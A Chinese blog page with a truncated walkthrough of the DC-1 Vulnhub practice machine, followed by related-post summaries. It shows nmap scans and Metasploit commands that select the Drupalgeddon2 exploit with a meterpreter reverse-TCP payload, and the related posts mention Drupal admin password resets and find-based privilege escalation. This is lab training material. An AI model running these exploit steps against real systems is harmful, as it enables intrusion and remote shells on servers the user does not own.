DC-1靶机渗透详细过程(附靶机连接)

最新推荐文章于 2024-08-02 18:51:42 发布
最新推荐文章于 2024-08-02 18:51:42 发布
阅读量786 收藏 4
点赞数 1
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bwt_D/article/details/117035128
版权
本文详述了对DC-1靶机的渗透测试过程,包括IP扫描、漏洞利用、shell获取、数据库交互、权限提升等步骤,最终达到root权限并找到所有flag。
摘要由CSDN通过智能技术生成

查看本机的ip地址在这里插入图片描述

使用nmap进行ip地址扫描,确定靶机的IP
nmap -sP 192.168.159.1/24
在这里插入图片描述
对其进行详细扫描
nmap -A 192.168.159.140 -p 1-65535

在这里插入图片描述
80端口开放,直接使用浏览器访问
在这里插入图片描述
使用MSF搜索该网页模板存在的漏洞
msfconsole
search drupal
在这里插入图片描述
使用第四个攻击模块
use exploit/unix/webapp/drupal_drupalgeddon2

选择攻击载荷

set payload php/meterpreter/reverse_tcp

添加

set RHOSTS 192.168.1.158

set LHOST 192.168.1.150

最低0.47元/天 解锁文章
bwt_D
关注
Vulnhub靶机:DC-1渗透详细过程
IerkeU的博客
01-27 2790
这次练习的是vulnhub平台下的DC系列靶机第一台,下载地址为https://www.vulnhub.com/entry/dc-1,292。该靶机的难度系数为简单,其中有五个flag,我们在练习的过程中可以直接跳过其中以部分flag中的提示直接拿到root权限。
【靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1202
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
DC-1靶场搭建及渗透实战详细过程DC靶场系列)
热门推荐
金 帛的博客
06-29 1万+
DC-1靶场渗透过程,写的有点多,把许多方法尽可能地列出来了,也参考了很多别的文章,希望对刚学习web渗透的小白有所帮助吧!
DC1--靶机实操详解
最新发布
qq_61802750的博客
08-02 522
111端口是一个rpcbind 2-4服务,这个服务存在一个漏洞,该漏洞可使攻击者在远程rpcbind绑定主机上分配任意大小的内存(每次攻击最高可达4GB),除非进程崩溃,或者管理员挂起/重启rpcbind服务,否则该内存不会被释放;特殊的 PERMS 将帮助找到 passwd - 但您需要 -exec 该命令来弄清楚如何获取隐藏中的东西。使用Drupal对数据库的加密方法,生成一个新密码,然后把新的密码更新到admin用户。一个是修改admin的密码,一个是增加一个admin权限的用户。
DC-1靶机渗透测试详细教程
啊醒的博客
05-04 5705
DC靶机系列渗透教程
DC-1渗透测试流程。
qq_60463414的博客
07-18 596
DC靶机系列DC-1渗透测试流程。
DC-2靶机渗透详细过程靶机链接)
bwt_D的博客
06-20 332
DC-2靶机下载链接: https://pan.baidu.com/s/1g8nEs5K0MYBCfQr-bGla-w 提取码:3xt9 查看kali主机ip:ifconfig 查看靶机的MAC地址:打开虚拟机设置,点击网络适配器,选择nat 模式,点击高级。 使用nmap扫描目标ip:nmap -sP 192.168.159.0/24 对比mac地址发现,目标靶机ip为192.168.159.139 使用nmap扫描端口:nmap -A 192.168.159.139 -p 1-65535 发现8
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-1靶机渗透笔记
qq_60600840的博客
08-08 221
DC-1靶机、安全、渗透靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC-1靶机渗透
plant1234的博客
04-17 1184
简介 靶机名称:DC1 下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 一、信息收集 利用nmap扫描发现主机: nmap -sP 192.168.229.0/24 获取主机为:192.168.229.180 收集主机端口和其它信息: nmap -sS -sV -T5 -A -p- 192.168.229.180 发现开发22端口和80端口,并且运行在Linux上 二、漏洞查找 发现有80端口直接访问得到: 发现是cms是drupal,用msf看一
记录一下 DC1靶机渗透
吃醋不爱蘸饺子的胡诌乱造
01-12 558
一.准备 首先kaili攻击机和DC1靶机都是桥接网络,为了nmap扫描(桥接网络在设置里)。 二.namp扫描 1.首先扫描一下这个网段 很容易可以看见DC1的靶机的ip地址192.168.1.108(这个当时扫了半天都没有扫到,我在nat网络和桥接里反复横跳,最终还是它自己好了(充分证明了当你做不出来,可以歇一歇然后自己就好了。猜测是网络切换需要一定的时间) 2.扫描这个ip地址开放的端口 可以看出来这里开放了80端口,我们可以看一下! 然后就是上图这个样子! 三.开始渗透 典型的drupal(我
063 渗透测试实战,靶机 DC-1
鸡蛋炒鸡蛋
04-23 3002
文章目录一:准备阶段二:flag1三:flag2四:flag3五:flag4六:flag5 一:准备阶段 DC-1下载与安装 下载:点我 安装: 下载之后进行解压,得到.ova文件 右键选择VMware打开, 选择路径,导入虚拟机,若出现下图情况,先点击取消,然后把vmware正处于开启状态的虚拟机关闭或者选择挂起。再重新选择路劲,导入虚拟机,若还是出现下图内容,则点击重试即可。 安装完成 点击编辑虚拟机 二:flag1 三:flag2 四:flag3 五:flag4 六:flag5 ...
靶机渗透练习69-DC1
hirak0的博客
04-21 1194
靶机描述 靶机地址:http://www.vulnhub.com/entry/dc-1,292/ Description DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. It was designed to be a challenge for beginners, but just how easy it is will
DC-4靶机渗透详细教程(靶机链接)
bwt_D的博客
03-01 5929
靶机链接:https://pan.baidu.com/s/1Bcy6_fOXj4ysZTcBIUOxpw 提取码:eefe 首先查看kali虚拟机的ip地址 ifconfig 可以看到我们kali的虚拟机ip为192.168.159.145 接着使用nmap工具进行扫描,获取靶机的IP地址 nmap -sP 192.168.159.2/24 打开靶机的虚拟机设置,选择网络适配器-高级,查看我们靶机的mac地址。与扫描的结果匹配,发现靶机的IP为192.168.159.142 继续使用namp对靶
DC-1详解(绝对的详细!)
学习!冲冲冲!
10-23 9203
DC-1靶机整个渗透过程(B站可以看小飞侠的视频真的好!) 将kali和DC-1的网络均设置为NAT模式 获取kali的IP地址 ifconfig 查看IP命令需要记住 扫描此IP段中存活的靶机IP arp-scan -l 根据靶机MAC地址来确认其IP地址 用masscan快速扫描DC-1开放的端口 masscan --rate10000 -p 1-65535 192.168.220.131 --rate10000 用来定义扫描速率 -p 1-65535 定义扫描从1-6553
DC-1
per_se_veran_ce的博客
09-14 365
扫描局域网设备 发现目标 扫描基本信息 nmap -sV 扫描目标主机和端口上运行的软件的版本 -p 80 扫描指定端口 -p- 扫描全部端口 -A 综合扫描,太慢了,不推荐 -sS/sT/sW 指定TCP SYN/ACK/Windows -pN 跳过默认的发现检查并对执行目标的完整端口扫描 -PS 进行TCP SYN Ping -PA 进行TCP ACK Ping -n ...
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放...以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值